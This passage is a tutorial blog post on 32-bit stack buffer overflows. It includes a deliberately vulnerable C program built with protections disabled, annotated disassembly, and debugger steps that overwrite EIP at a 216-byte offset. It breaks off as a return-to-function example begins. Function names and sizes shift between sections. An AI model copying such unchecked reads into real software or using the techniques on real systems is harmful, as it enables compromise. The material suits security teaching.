
# Buffer Overflows

<details>

<summary>Table of Contents</summary>

* [Foreword](#foreword)
* [Introduction](#introduction)
* [Insecure Example](#insecure-example)
* [Binary Disassembly](#binary-disassembly)
  * [The Main Function](#the-main-function)
  * [The Insecure Function](#the-insecure-function)
* [Stack Overflow](#stack-overflow)
* [Finding the EIP Offset](#finding-the-eip-offset)
* [Returning to Function](#returning-to-function)

</details>

## Foreword

<mark style="background-color:yellow;">I've created a video on the topic of stack-based buffer overflows, which you can find below</mark>. Personally, I find it much easier to watch it and follow along rather than reading the novella that this piece is. However, you can still get a ton of use from this blog regardless!&#x20;

{% embed url="<https://youtu.be/6sUd3AA7Q50>" %}
Buffer Overflows: A Symphony of Exploitation
{% endembed %}

## Introduction

Welcome to a highly saturated and already beat-to-death topic! Today, we’re exploiting a program via a buffer overflow attack. Except in this blog, rather than give you a step-by-step basic-ass way to exploit a binary, we'll do an extremely *deep* dive, from the compilation of the program to its eventual exploitation. So, without further ado, let’s jump right into it. First, let's consider the following source code:

{% code title="secure.c" %}

```c
// gcc -m32 -Wall -Wpedantic -g -o secure secure.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define MAX_SIZE 256

void secure(void) {
        char buffer[MAX_SIZE];
        printf("[>] hello, give me something to read!\n");
        int input = read(0, buffer, MAX_SIZE);
        printf("[+] user supplied %d-bytes!\n", input);
        printf("[+] buffer content: %s\n", buffer);
        return;
}

int main(void) {
        secure();
        return EXIT_SUCCESS;
}
```

{% endcode %}

<mark style="background-color:yellow;">This program is perfectly secure</mark>. We set up a buffer that’s `MAX_SIZE` wide, which we've defined to be `256`-bytes. When we take input from the user, we only allow `MAX_SIZE`-bytes to be read into that buffer. We couldn’t even overflow this if we tried (I mean, eventually, we would break the pipe given enough characters, but that’s not important right now). Let’s see what happens if we try to sneak in a couple thousand more bytes than what’s explicitly defined:

<figure><img src="/files/9YFdEpPasPwgjAqvzGZO" alt=""><figcaption><p>Output from the overflow attempt</p></figcaption></figure>

{% hint style="warning" %}
If you're trying to compile this program and you run into the following error:

```bash
In file included from /usr/include/features.h:535,
                 from /usr/include/bits/libc-header-start.h:33,
                 from /usr/include/stdio.h:28,
                 from secure.c:1:
/usr/include/gnu/stubs.h:7:11: fatal error: gnu/stubs-32.h: No such file or directory
    7 | # include <gnu/stubs-32.h>
      |           ^~~~~~~~~~~~~~~~
compilation terminated.
```

It's because you're missing the 32-bit "`libc-dev`" package. You can find the command to install this package for your distribution from [here](https://stackoverflow.com/a/7412698). In my case, I was also running into the following error:

```bash
insecure.c: In function ‘overflow_me’:
insecure.c:8:17: warning: ‘read’ writing 512 bytes into a region of size 256 overflows the destination [-Wstringop-overflow=]
    8 |     int input = read(0, buffer, 512); /* MAX_SIZE * 2 */
      |                 ^~~~~~~~~~~~~~~~~~~~
insecure.c:7:10: note: destination object ‘buffer’ of size 256
    7 |     char buffer[MAX_SIZE];
      |          ^~~~~~
In file included from insecure.c:3:
/usr/include/unistd.h:371:16: note: in a call to function ‘read’ declared with attribute ‘access (write_only, 2, 3)’
  371 | extern ssize_t read (int __fd, void *__buf, size_t __nbytes) __wur
      |                ^~~~
/usr/bin/ld: skipping incompatible /usr/lib/gcc/x86_64-pc-linux-gnu/14.2.1/../../../libgcc_s.so.1 when searching for libgcc_s.so.1
/usr/bin/ld: skipping incompatible /usr/lib/gcc/x86_64-pc-linux-gnu/14.2.1/../../../libgcc_s.so.1 when searching for libgcc_s.so.1
/usr/bin/ld: skipping incompatible /usr/lib/libgcc_s.so.1 when searching for libgcc_s.so.1
/usr/bin/ld: cannot find libgcc_s.so.1: No such file or directory
/usr/bin/ld: skipping incompatible /usr/lib/gcc/x86_64-pc-linux-gnu/14.2.1/../../../libgcc_s.so.1 when searching for libgcc_s.so.1
/usr/bin/ld: skipping incompatible /usr/lib/libgcc_s.so.1 when searching for libgcc_s.so.1
collect2: error: ld returned 1 exit status
```

Which I managed to fix by installing the "`lib32-gcc-libs`" and "`lib32-glibc`" packages on my Arch machine. However, please note that this *may* or may *not* work for you. It's still worth a try though! :man\_shrugging:

```bash
sudo pacman -S lib32-gcc-libs lib32-glibc
```

{% endhint %}

## Insecure Example

Now, let’s take a look at the following code:

{% code title="insecure.c" %}

```c
// gcc -m32 -Wall -Wpedantic -no-pie -fno-stack-protector -g -o insecure insecure.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define MAX_SIZE 256

void insecure(void) {
        char buffer[MAX_SIZE];
        printf("[>] hello, give me something to read!\n");
        int input = read(0, buffer, 512); // MAX_SIZE * 2
        printf("[+] user supplied %d-bytes!\n", input);
        printf("[+] buffer content: %s\n", buffer);
        return;
}

int main(void) {
        insecure();
        return EXIT_SUCCESS;
}
```

{% endcode %}

{% hint style="info" %}
The extra flags in the compilation command, `-no-pie` and `-fno-stack-protector`, are included to make our exploitation process easier. Without them, we'd have to deal with [stack canaries](/nest/binexp/sec/stack-canaries.md) and [PIE](/nest/binexp/sec/position-independent-executable-pie.md), which are *way* out of the scope of this blog post. Don't worry, we will circumvent these [protection mechanisms](/nest/binexp/sec.md) soon.
{% endhint %}

This is where stuff gets a bit… *bad*. The only difference between this code and the "`secure.c`" code is the following line:&#x20;

<pre class="language-c" data-title="insecure.c"><code class="lang-c">[...]
<strong>int input = read(0, buffer, 512); // MAX_SIZE * 2
</strong>[...]
</code></pre>

This time, the user can explicitly input *more* bytes than the buffer can hold. Recall that the buffer is set to `MAX_SIZE` (`256`-bytes); yet we're allowed to input `512`-bytes—literally *double* the amount that the buffer can handle. Luckily, when we try to compile this *horrendous* thing, we can see that the compiler screams at us—telling us that what we’re trying to compile is *ludicrously* insecure:

<figure><img src="/files/lxODc6H5alSv34AAUrLb" alt=""><figcaption><p>Compiler screams at us, but it still compiles our binary</p></figcaption></figure>

{% hint style="info" %}
Now, there is a way to actually combat this effectively, or at least, combat super simple buffer overflows and other bugs like this. That is, by using the "`-Werror`" flag in our compilation step. This flag tells our compiler to treat all warnings as errors and thus, will result in our binary not getting compiled at the slightest hint of a warning being encountered, as seen below:\
\
![](/files/nevhDYqzTgXeEy211Chi)

\
Now, this is effective, but is it *efficient*? I'm sure the point can be debated for either side, but let's leave that question up in the air for discussion :wink:
{% endhint %}

Now, if we try to supply more bytes than the buffer size, we can see that we get a segmentation fault (also known as a "`SIGSEGV`"):

<figure><img src="/files/jq622AfWr7fo58w21M3y" alt=""><figcaption><p>Segmentation fault achieved!</p></figcaption></figure>

For us, as exploit developers, this is fantastic. For users of this program or the developers, this is a nightmare. And we'll see why that is shortly. Just as a fun little experiment, I'll show you the same buffer overflow attempt shown above, except this time, I'll omit the "`-fno-stack-protector`" flag from the compilation command. This will show us why we must include it:

<figure><img src="/files/TEFX0SIxaITNhW3FIeue" alt=""><figcaption><p>Stack canary in action</p></figcaption></figure>

We no longer get a segmentation fault. Instead, the program exits immediately after our barrage attempt. The way this defence mechanism works will be covered in another post, specifically the "[stack canary](/nest/binexp/sec/stack-canaries.md)" post. However, a very crude and simplified explanation of this security mechanism and how it works is the following:

1. For every function the compiler decides to protect, a random "stack cookie" value (generated once, when the program starts) is loaded into the accumulator register (`AX`) and then stored on the stack, right after the [function prologue](#user-content-fn-1)[^1].&#x20;
   1. If your program is compiled for 64-bit Linux, the stack cookie gets loaded into the `RAX` register, and it gets this value from the `FS` segment register at the offset of `0x28`.&#x20;
   2. If your program is compiled for 32-bit Linux, the stack cookie gets loaded into the `EAX` register, and it gets this value from the `GS` segment register at the offset of `0x14`.
2. The function will continue executing until it gets to the end, where there's a check to see if the stack cookie's value has been overwritten or not—which, if you're overwriting data as is expected with a buffer overflow attack, isn't all that unlikely.&#x20;
   1. If the stack cookie value is altered, then the `__stack_chk_fail` function will be executed immediately, and the program will print out a "`*** stack smashing detected ***`" message before exiting.
   2. Otherwise, the program will continue on as normal and keep on going until it naturally finishes or exits.
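To make the check described above a little more concrete, here's a toy model of it in Python. Treat it as a rough sketch and nothing more: the frame layout, the `call_protected` helper, and the saved `EBP` value are all made up for illustration, and a real cookie lives in thread-local storage rather than in a Python variable.

```python
import os
import struct

BUF_SIZE = 256  # mirrors MAX_SIZE from insecure.c

# Assumption: a random per-run cookie. glibc commonly zeroes the lowest byte,
# so the first byte is modelled as 0x00 here.
CANARY = b"\x00" + os.urandom(3)


def call_protected(user_input: bytes) -> str:
    """Model one protected call: buffer | cookie | saved EBP | return address."""
    frame = bytearray(BUF_SIZE) + CANARY + struct.pack("<II", 0xFFFFD228, 0x0804907B)

    # The unchecked copy, like read(0, buffer, 512): it writes whatever it is
    # given, even if that runs past the end of the buffer.
    data = user_input[:512]
    frame[: len(data)] = data

    # Epilogue check: compare the cookie on the "stack" with the reference copy.
    if bytes(frame[BUF_SIZE : BUF_SIZE + 4]) != CANARY:
        return "*** stack smashing detected ***"
    return "returned normally"


print(call_protected(b"A" * 256))  # fits exactly, cookie untouched
print(call_protected(b"A" * 300))  # runs over the cookie
```

The point of the model is the ordering: the cookie sits between the buffer and the saved return address, so a linear overflow can't reach the return address without trampling the cookie first.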

## Binary Disassembly

It is now time to open up our `insecure` binary in a disassembler/debugger. I'll be using [`pwndbg`](https://github.com/pwndbg/pwndbg). From the [installation section](https://github.com/pwndbg/pwndbg?tab=readme-ov-file#how) on the repository, installation is as straightforward as:

```bash
git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh
```

{% hint style="info" %}
Please note that there are many "flavours" of `gdb`, such as: `gef`, `pwndbg`, `peda`, etc. Further, there are more debuggers/disassemblers you can use, especially for the reverse engineering process, like Ghidra, Radare2, Cutter, IDA, Binary Ninja, etc. Don't limit yourself to one (`1`) tool and try to experiment a lot. Try to find a comfortable workflow that works for *you*.
{% endhint %}

<figure><img src="/files/7KN01OG60lSxcHNvr9qV" alt=""><figcaption><p>Opening our binary inside of <code>pwndbg</code></p></figcaption></figure>

Now that it’s open, we can examine the program’s innards. First, let’s start by finding all the functions present in this binary (this would be a lot harder if the binary was stripped but luckily for us, it’s not):

<figure><img src="/files/iAydav4fnizXxq6UYKWl" alt=""><figcaption><p>Functions in the binary</p></figcaption></figure>

{% hint style="info" %}
I apologize for the sudden change in appearance and directories. I continued this demonstration on a new Arch setup I've been tinkering with, and so, some things like the theme and working directory might be different.
{% endhint %}

### The Main Function

Thankfully, we can ignore *most* of the output above. The functions we’d like to focus on are the `main` and `insecure` functions. If we go inside of `main`, we’ll be able to see what the program does when it runs:

<figure><img src="/files/hsAMpS7qWyPVzcqOm5j7" alt=""><figcaption><p>Disassembly of <code>main</code></p></figcaption></figure>

If you’re having difficulty understanding this output, don't worry. Assembly can be *really* hard sometimes. However, take solace in the fact that this example is not as intimidating as it looks. We'll tackle this line-by-line. Let’s look at the source code so you can compare the disassembly to the pure source code:

```c
int main(void) {
        insecure();
        return EXIT_SUCCESS;
}
```

{% hint style="info" %}
Note that in `x86_64`/`x86`, return values of functions are typically stored in `RAX`/`EAX`, respectively. In the disassembly, we can see our return value (`0`) being placed in `EAX` by `xor eax,eax` (XORing a register with itself zeroes it), which directly corresponds to our "`return EXIT_SUCCESS;`" line in the source code, since `EXIT_SUCCESS` is `0`.
{% endhint %}

```nasm
Dump of assembler code for function main:
   0x08049070 <+0>:	push   ebp
   0x08049071 <+1>:	mov    ebp,esp
   0x08049073 <+3>:	and    esp,0xfffffff0
   0x08049076 <+6>:	call   0x80491a0 <insecure>
   0x0804907b <+11>:	xor    eax,eax
   0x0804907d <+13>:	leave
   0x0804907e <+14>:	ret
End of assembler dump.
```

#### Function Prologues & Epilogues

To better understand what we're about to talk about, it's important to cover some necessary background on how functions are set up and how they might alter the stack when we look at them in assembly.

> "In [assembly language](https://en.wikipedia.org/wiki/Assembly_language) [programming](https://en.wikipedia.org/wiki/Computer_programming), the function prologue is a few lines of code at the beginning of a function, which prepare the [stack](https://en.wikipedia.org/wiki/Call_stack) and [registers](https://en.wikipedia.org/wiki/Processor_register) for use within the function. Similarly, the function epilogue appears at the end of the function, and restores the stack and registers to the state they were in before the function was called."
>
> — [Wikipedia](https://en.wikipedia.org/wiki/Function_prologue_and_epilogue)

Remember, we're in super low-level territory now. We have to (or in this case, the compiler has to) manually set up *everything* to call a function, and I mean *everything*. Let's take the following code for example:

```c
#include <stdio.h>

int add(int a, int b) {
    int result = a + b;
    printf("%d + %d = %d\n", a, b, result);
    return result;
}

int main(void) {
    return add(4, 6);
}
```

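For our CPU to invoke these functions, the stack has to be set up for them. On 32-bit x86, this is usually done in three (3) steps or so:

1. Push the base pointer on the stack for restoration later (in the epilogue).
2. Copy the stack pointer into the base pointer, so the new stack frame starts where the old one ended.
3. Subtract from the stack pointer to reserve space for the function's local variables.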
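The usual 32-bit prologue (`push ebp`, `mov ebp,esp`, `sub esp,N`) and its matching epilogue (`leave`, `ret`) can be modelled with a few lines of Python. This is only a toy: the `memory` dictionary, the starting register values, and the `push`/`pop` helpers are invented for illustration, while the return address and frame size are borrowed from the listings in this post.

```python
# Toy model of a 32-bit stack: a dict of address -> value plus two registers.
memory = {}
regs = {"esp": 0xFFFFD100, "ebp": 0xFFFFD128}  # made-up starting values


def push(value):
    regs["esp"] -= 4               # the stack grows toward lower addresses
    memory[regs["esp"]] = value


def pop():
    value = memory[regs["esp"]]
    regs["esp"] += 4
    return value


caller_ebp = regs["ebp"]

push(0x0804907B)              # `call` pushes the return address

# --- prologue ---
push(regs["ebp"])             # push ebp      (save the caller's frame)
regs["ebp"] = regs["esp"]     # mov ebp, esp  (start a new frame)
regs["esp"] -= 0xD8           # sub esp, 0xd8 (reserve space for locals)

# --- epilogue ---
regs["esp"] = regs["ebp"]     # leave, part 1: mov esp, ebp
regs["ebp"] = pop()           # leave, part 2: pop ebp
eip = pop()                   # ret: pop the return address into EIP

print(hex(regs["ebp"]), hex(regs["esp"]), hex(eip))
```

After the epilogue, `EBP` and `ESP` are back to what they were before the call, and `EIP` holds the return address that `call` pushed. Keep that last `pop()` in mind, because it's the one we'll be abusing later.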

### The Insecure Function

Let’s move on to something a bit more interesting. Now that we know (I mean we already knew since we compiled the damn program, but let’s pretend that we were [hacking blindly](#user-content-fn-2)[^2]) what’s inside of the `main` function, let’s disassemble the function that we found inside of it, "`overflow_me`":

<figure><img src="/files/w8DVSqqmmZqAyP4IBmF6" alt=""><figcaption><p>Disassembly of <code>overflow_me</code></p></figcaption></figure>

Before going any further, let’s bring back the source code of the `overflow_me` function and let's read the `man` pages for the `read` function so we can better make sense of the output:

{% code title="vulnerable.c" %}

```c
[...]

void overflow_me(void) {
    char buffer[MAX_SIZE];
    int input = read(0, buffer, 512); /* MAX_SIZE * 2 */
    printf("[+] user supplied %d-bytes!\n", input);
    printf("[+] buffer content: %s\n", buffer);
    return;
}

[...]
```

{% endcode %}

<figure><img src="/files/3RQSNPMB9kAINu2zHmui" alt=""><figcaption><p><code>read</code> <code>man</code> page</p></figcaption></figure>

We see that `read` has the following signature:

```c
ssize_t read(int fd, void buf[.count], size_t count);
```

On success, it returns a `ssize_t` (the number of bytes that have been read into the buffer), and on error, a `-1` is returned, which we can confirm in the "return value" section of the `man` pages:

```bash
RETURN VALUE
       On success, the number of bytes read is returned (zero indicates end of file), and the
       file position is advanced by this number. [...]

       On error, -1 is returned, and errno is set to indicate the error. In this case, it is
       left unspecified whether the file position (if any) changes.
       
[...]
```
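If you'd like to poke at this behaviour without compiling anything, Python's `os.read` is a thin wrapper around the same system call. The sketch below uses a pipe as a stand-in for standard input (that's my assumption to keep it runnable anywhere), and note that `os.read` hands back the bytes themselves rather than a count, so the "return value" is the length of what it returns.

```python
import os

MAX_SIZE = 256

# A pipe stands in for stdin so the example runs without a terminal.
read_end, write_end = os.pipe()
os.write(write_end, b"A" * 600)      # the "user" offers 600 bytes
os.close(write_end)

first = os.read(read_end, MAX_SIZE)  # like read(fd, buffer, MAX_SIZE)
rest = os.read(read_end, 4096)       # whatever is still queued in the pipe
eof = os.read(read_end, MAX_SIZE)    # writer closed and pipe drained: end of file
os.close(read_end)

print(len(first), len(rest), len(eof))
```

No matter how much is waiting, a single call never hands over more than the count it was given, which is exactly why the count has to match the size of the destination buffer.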

The first parameter of this function is `fd`, which is the "file descriptor" we wish to read from. Every process starts with three (`3`) standard file descriptors:

* Zero (`0`): Standard Input (`STDIN`)
* One (`1`): Standard Output (`STDOUT`)
* Two (`2`): Standard Error (`STDERR`)&#x20;

We're reading bytes from the user's input, so we supply zero (`0`), standard input, as the argument. We can see this being pushed just above our call to `read` in the disassembly here:

```bash
0x080491ad <+29>:	push   0x0 # fd = 0 (stdin)
```

If we examine the output of the disassembled function, we can see the arguments being pushed onto the stack *before* the call to the `read` function, which is responsible for actually taking in our user input. On 32-bit x86, arguments are pushed in reverse order, so the last argument (the number of bytes to read) goes first. Next, the address of `[ebp-0xd4]`, which is where our buffer lives, is loaded into the `EAX` register (`<+17>`). After this, the buffer's address (now in the `EAX` register) is pushed on the stack as an argument for that aforementioned `read` function. Note that in the listings below, the function is named `overflow` and the size passed to `read` is `400`; the mechanics are exactly the same. If we look carefully, we can see all of the arguments that are passed into `read` being pushed on the stack. Observe:

```c
  input = read(0, buffer, 400);
```

So, the first argument of the `read` function is a zero (`0`). We can see this being pushed on the stack at `<+24>`:

```c
gdb-peda$ disas overflow
Dump of assembler code for function overflow:
   0x08049176 <+0>:	push   ebp
   0x08049177 <+1>: 	mov    ebp,esp
   0x08049179 <+3>:	sub    esp,0xd8
   0x0804917f <+9>:	sub    esp,0x4
   0x08049182 <+12>:	push   0x190
   0x08049187 <+17>:	lea    eax,[ebp-0xd4]
   0x0804918d <+23>:	push   eax
   0x0804918e <+24>:	push   0x0                     # read([0], buffer, 400)  
   0x08049190 <+26>:	call   0x8049030 <read@plt>
   0x08049195 <+31>:	add    esp,0x10
   0x08049198 <+34>:	mov    DWORD PTR [ebp-0xc],eax
   0x0804919b <+37>:	sub    esp,0x8
   0x0804919e <+40>:	push   DWORD PTR [ebp-0xc]
   0x080491a1 <+43>:	push   0x804a008
   0x080491a6 <+48>:	call   0x8049040 <printf@plt>
   0x080491ab <+53>:	add    esp,0x10
   0x080491ae <+56>:	sub    esp,0x8
   0x080491b1 <+59>:	lea    eax,[ebp-0xd4]
   0x080491b7 <+65>:	push   eax
   0x080491b8 <+66>:	push   0x804a028
   0x080491bd <+71>:	call   0x8049040 <printf@plt>
   0x080491c2 <+76>:	add    esp,0x10
   0x080491c5 <+79>:	mov    eax,0x0
   0x080491ca <+84>:	leave
   0x080491cb <+85>:	ret
End of assembler dump.
```

Next, we see the buffer variable being passed into the function, which we already just covered:

```c
gdb-peda$ disas overflow
Dump of assembler code for function overflow:
   0x08049176 <+0>:	push   ebp
   0x08049177 <+1>:	mov    ebp,esp
   0x08049179 <+3>:	sub    esp,0xd8
   0x0804917f <+9>:	sub    esp,0x4
   0x08049182 <+12>:	push   0x190
   0x08049187 <+17>:	lea    eax,[ebp-0xd4]            
   0x0804918d <+23>:	push   eax                     # read(0, [buffer], 400)
   0x0804918e <+24>:	push   0x0
   0x08049190 <+26>:	call   0x8049030 <read@plt>
   0x08049195 <+31>:	add    esp,0x10
   0x08049198 <+34>:	mov    DWORD PTR [ebp-0xc],eax
   0x0804919b <+37>:	sub    esp,0x8
   0x0804919e <+40>:	push   DWORD PTR [ebp-0xc]
   0x080491a1 <+43>:	push   0x804a008
   0x080491a6 <+48>:	call   0x8049040 <printf@plt>
   0x080491ab <+53>:	add    esp,0x10
   0x080491ae <+56>:	sub    esp,0x8
   0x080491b1 <+59>:	lea    eax,[ebp-0xd4]
   0x080491b7 <+65>:	push   eax
   0x080491b8 <+66>:	push   0x804a028
   0x080491bd <+71>:	call   0x8049040 <printf@plt>
   0x080491c2 <+76>:	add    esp,0x10
   0x080491c5 <+79>:	mov    eax,0x0
   0x080491ca <+84>:	leave
   0x080491cb <+85>:	ret
End of assembler dump.
```

Lastly, we have the 400 bytes we’re allowed to input into the buffer variable:

```c
gdb-peda$ disas overflow
Dump of assembler code for function overflow:
   0x08049176 <+0>:	push   ebp
   0x08049177 <+1>:	mov    ebp,esp
   0x08049179 <+3>:	sub    esp,0xd8
   0x0804917f <+9>:	sub    esp,0x4
   0x08049182 <+12>:	push   0x190                   # read(0, buffer, [400])
   0x08049187 <+17>:	lea    eax,[ebp-0xd4]            
   0x0804918d <+23>:	push   eax
   0x0804918e <+24>:	push   0x0
   0x08049190 <+26>:	call   0x8049030 <read@plt>
   0x08049195 <+31>:	add    esp,0x10
   0x08049198 <+34>:	mov    DWORD PTR [ebp-0xc],eax
   0x0804919b <+37>:	sub    esp,0x8
   0x0804919e <+40>:	push   DWORD PTR [ebp-0xc]
   0x080491a1 <+43>:	push   0x804a008
   0x080491a6 <+48>:	call   0x8049040 <printf@plt>
   0x080491ab <+53>:	add    esp,0x10
   0x080491ae <+56>:	sub    esp,0x8
   0x080491b1 <+59>:	lea    eax,[ebp-0xd4]
   0x080491b7 <+65>:	push   eax
   0x080491b8 <+66>:	push   0x804a028
   0x080491bd <+71>:	call   0x8049040 <printf@plt>
   0x080491c2 <+76>:	add    esp,0x10
   0x080491c5 <+79>:	mov    eax,0x0
   0x080491ca <+84>:	leave
   0x080491cb <+85>:	ret
End of assembler dump.
```

How is that 400? Well, the value being pushed (`0x190`) is hexadecimal for `400`. We can verify this with:

```bash
gdb-peda$ print /d 0x190 # /d to print out a decimal
$1 = 400
```

Thus, we have reverse-engineered all the arguments to the `read` function! Pretty fascinating stuff, right 😄?&#x20;

## Stack Overflow

Let’s get even *more* in-depth and interact with the program. First, let’s create a text file to hold all of our A’s:

```bash
bin_0x01 ›› python -c 'print("A" * 600)' > input.txt
```

I chose 600 bytes arbitrarily; you can choose whatever you like. Now, let’s run the program, supplying our input, of course:

{% hint style="warning" %}
Although the number of bytes I supplied is arbitrary, you should still be mindful of how much you initially supply. It's better to start small and work your way up.
{% endhint %}

```bash
gdb-peda$ r < input.txt
```

<figure><img src="/files/DeojNTqZh8OQXrUooMLQ" alt=""><figcaption><p>Segmentation fault </p></figcaption></figure>

As expected, we’ve got a segmentation fault. Since this is going to be more in-depth than just a simple “do this after crashing the program” kind of article, let’s examine what happens to the program before it dies, as a sort of autopsy on a still-living patient. <mark style="background-color:orange;">To do this, we're going to use an extremely useful feature called “breakpoints”. When the program reaches a breakpoint, its execution stops, halts, or “breaks”</mark>. So, let’s set three breakpoints: one before the call to `read`, one right after it, and lastly, one on the return (`ret`) instruction.

<figure><img src="/files/204qmufAce8Zi5VJtIC2" alt=""><figcaption><p>Setting breakpoints</p></figcaption></figure>

Now, if we run the program, it should hit the first breakpoint right before the call to the read function.

```bash
gdb-peda$ r
```

<figure><img src="/files/QmmGEYgUcG0F6Nyionnj" alt=""><figcaption><p>First breakpoint hit</p></figcaption></figure>

We can see from the code section that we’re currently inside the `overflow` function. We can confirm this by examining a few instructions starting at the address held in the `EIP` register:

<figure><img src="/files/Z2ZylNjWfzk2Yp5OzNEX" alt=""><figcaption><p>Examining the <code>EIP</code> register</p></figcaption></figure>

Nice, this looks like the `overflow` function, and if we recall, our input will be stored inside of the buffer variable, which is located at `[ebp-0xd4]`. We can find the address of this region by subtracting the buffer's offset from `EBP` (the offset depends on the build, so use the one your own disassembly shows):

```c
gdb-peda$ p $ebp-0x200
$1 = (void *) 0xffffd028
```

If we view this address, we won’t find our “A”s in there yet because remember, we’re at the breakpoint right before the program will take our input and toss it into the region we’re going to be examining (the buffer):

<figure><img src="/files/QbOGm6go9Deqrpf9SOKs" alt=""><figcaption><p>Examining the memory region for <code>$ebp-0x200</code> (<code>0xffffd028</code>)</p></figcaption></figure>

If we continue the execution of the program using `c`, we can then re-examine this block of memory and we should see our A’s in there!

```bash
gdb-peda$ c
```

<figure><img src="/files/vjms0D5HtQonZzRCyUaT" alt=""><figcaption><p>Second breakpoint hit</p></figcaption></figure>

We’re at the second breakpoint now, i.e., right after the call to `read`. Which means…

<figure><img src="/files/IMWcHPUu3YJYtVCYg7tw" alt=""><figcaption><p>Memory region filled with A's</p></figcaption></figure>

Nice! We can see that A’s are all up in here. The next thing we need to take a look at is why the program crashes.

{% hint style="info" %}
Since our input is larger than the declared variable size, the A’s obviously need to go *somewhere*. `read` simply keeps writing past the end of the buffer, toward higher addresses, overwriting/overflowing other crucial data that was meant to reside there. <mark style="background-color:orange;">One critical piece of data that was overwritten was the "</mark>*<mark style="background-color:orange;">return address</mark>*<mark style="background-color:orange;">."</mark>
{% endhint %}

Once the `overflow` function is complete, the return address that was pushed onto the stack is meant to hand execution back to the rest of the `main` function. However, if we hit continue again, we hit the last breakpoint, set at the return instruction.

{% hint style="info" %}
The return instruction pops the value at the top of the stack and puts it into the `EIP`.
{% endhint %}

The stack pointer (`ESP`) holds the address of the top of the stack. So, once we get to our last breakpoint, we can see:

<figure><img src="/files/43ia7t9UYln0HS5DOTui" alt=""><figcaption><p>3rd breakpoint hit, on the ret instruction</p></figcaption></figure>

We’re at the `RET` instruction, and what’s going to happen here is that the value `ESP` points to (i.e., the value at the top of the stack, which would normally be the return address that takes us back into `main`) gets popped into the `EIP` register. Since that value is now a bunch of A’s, the program is going to crash. Let’s step inside the debugger and see if we can catch the moment the `EIP` gets filled with the value at the top of the stack due to the `RET` instruction:

```c
step
```

<figure><img src="/files/OZ4AtGCTbuZjG7p6hdSc" alt=""><figcaption><p>EIP register overwritten with A's</p></figcaption></figure>

It’s just like we thought. **`ESP`** once pointed at a normal and perfectly usable return address, but our overflow reached far enough to overwrite it. So `RET` took what was on top of the stack (a bunch of A’s), put that in the **`EIP`** register, and the **`EIP`** register told the program to run the instruction at `0x41414141`. That isn’t a mapped memory address, so we’ve crashed.

<figure><img src="/files/GZ6g5ngp8O61wbqUKpxO" alt=""><figcaption><p>Stack overwritten with A's</p></figcaption></figure>
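What we just watched in the debugger can be replayed in a few lines of Python. It's a simplified sketch, not a faithful emulation: the saved `EBP` value is made up, the return address is borrowed from the `main` listing earlier, and the frame is just a `bytearray` laid out as buffer, saved `EBP`, return address.

```python
import struct

BUF_OFFSET = 0xD4                         # the buffer starts at [ebp-0xd4] in the listing

frame = bytearray(BUF_OFFSET)             # the buffer (plus padding) below EBP
frame += struct.pack("<I", 0xFFFFD228)    # saved EBP (made-up value)
frame += struct.pack("<I", 0x0804907B)    # return address back into main


def saved_return_address(frame):
    """Read the 4 bytes that `ret` would pop into EIP."""
    return struct.unpack_from("<I", frame, BUF_OFFSET + 4)[0]


before = saved_return_address(frame)

data = (b"A" * 600)[:400]                 # read(0, buffer, 400) takes at most 400 bytes
frame[: len(data)] = data                 # no bounds check: writes straight through the frame

after = saved_return_address(frame)
print(hex(before), hex(after))
```

The second value is four `0x41` bytes, i.e. our A's, sitting exactly where the return address used to be.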

## Finding the EIP Offset

The even more dangerous part is that we can very obviously overflow the stack to the point that, once the **`RET`** instruction is reached, a completely useless address gets popped into the **`EIP`** register. But what if we stop our padding just before the return address and then overwrite the return address, not with a bunch of A’s, but with the address of some actually useful code, like, for instance, some code that we put on the stack? In order to do that, we first need to figure out the offset from the start of our input to the saved return address (the value that ends up in the **`EIP`**). To find it, we generate a pattern:

```bash
gdb-peda$ pattern create 600 pattern.txt
Writing pattern of 600 chars to filename "pattern.txt"
```

Now, let’s run the program using the newly created pattern as our input:

<figure><img src="/files/93QBRwkLTKdelH4Nm72K" alt=""><figcaption><p>Running with pattern as input</p></figcaption></figure>

It might be hard to see, but the value stored inside of the **`EIP`** register is: **`0x4325416e`**. Since we have this address now, we can find the offset using the following command:

```c
gdb-peda$ pattern offset 0x4325416e
1126515054 found at offset: 216
```
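If you're curious how a pattern lookup like this works under the hood, here's a small sketch of the idea. To be clear, this is *not* peda's algorithm: `make_pattern` and `find_offset` are names I made up, and the pattern is the `Aa0Aa1Aa2...` layout, chosen because no 4-byte window in it ever repeats. The principle is the same, though: whichever 4 bytes land in `EIP` can only have come from one position in the input.

```python
import string


def make_pattern(length):
    """Build an `Aa0Aa1Aa2...` pattern; no 4-byte window in it repeats."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length].encode()
    raise ValueError("pattern too long for this generator")


def find_offset(pattern, eip_value):
    """Return where the 4 bytes that landed in EIP sit inside the pattern."""
    needle = eip_value.to_bytes(4, "little")  # EIP holds the bytes in little-endian order
    return pattern.find(needle)


pattern = make_pattern(600)

# Pretend the program crashed with the pattern bytes from offset 216 in EIP.
crashed_eip = int.from_bytes(pattern[216:220], "little")
print(find_offset(pattern, crashed_eip))

# Cross-check against the disassembly: the buffer starts at [ebp-0xd4],
# and 4 bytes of saved EBP sit between it and the return address.
print(0xD4 + 4)
```

The cross-check at the end is worth internalizing: the offset isn't magic, it falls straight out of the stack frame layout we reverse-engineered earlier.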

Okay, perfect. We know that we can supply 216 bytes before we start overwriting the return address. So, let’s see if we can overwrite the **`EIP`** with a bunch of B’s:

```bash
bin_0x01 ›› python -c 'print("A" * 216 + "B" * 4 + "C" * 180)' > offset.txt
```

It’s good to use the same number of bytes as you started with and fill the unused bytes with a different character, just to make good use of the space and to better see ourselves on the stack. Let’s run this, and if we’ve overwritten values properly, we should see that our `EIP` register holds a value of **`0x42424242`** (B’s in hex):

<figure><img src="/files/U0ISM4nSrFix2aGXvPW1" alt=""><figcaption><p>EIP register written with B's</p></figcaption></figure>

## Returning to Function

Perfect! Now, all we need to do is supply our own shellcode to abuse this or find a function that’s stupidly overpowered to hack the program for us. Let’s examine a case where we could populate the **`EIP`** with the address of a function left inside of the program to hack it for us. First, let’s edit our source code:

{% code title="vulnerable\_II.c" %}

```c
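#include <stdio.h>
#include <stdlib.h> // system()
#include <unistd.h> // read()

// Never called anywhere: dead code that we'll redirect execution into.
int hackme(){
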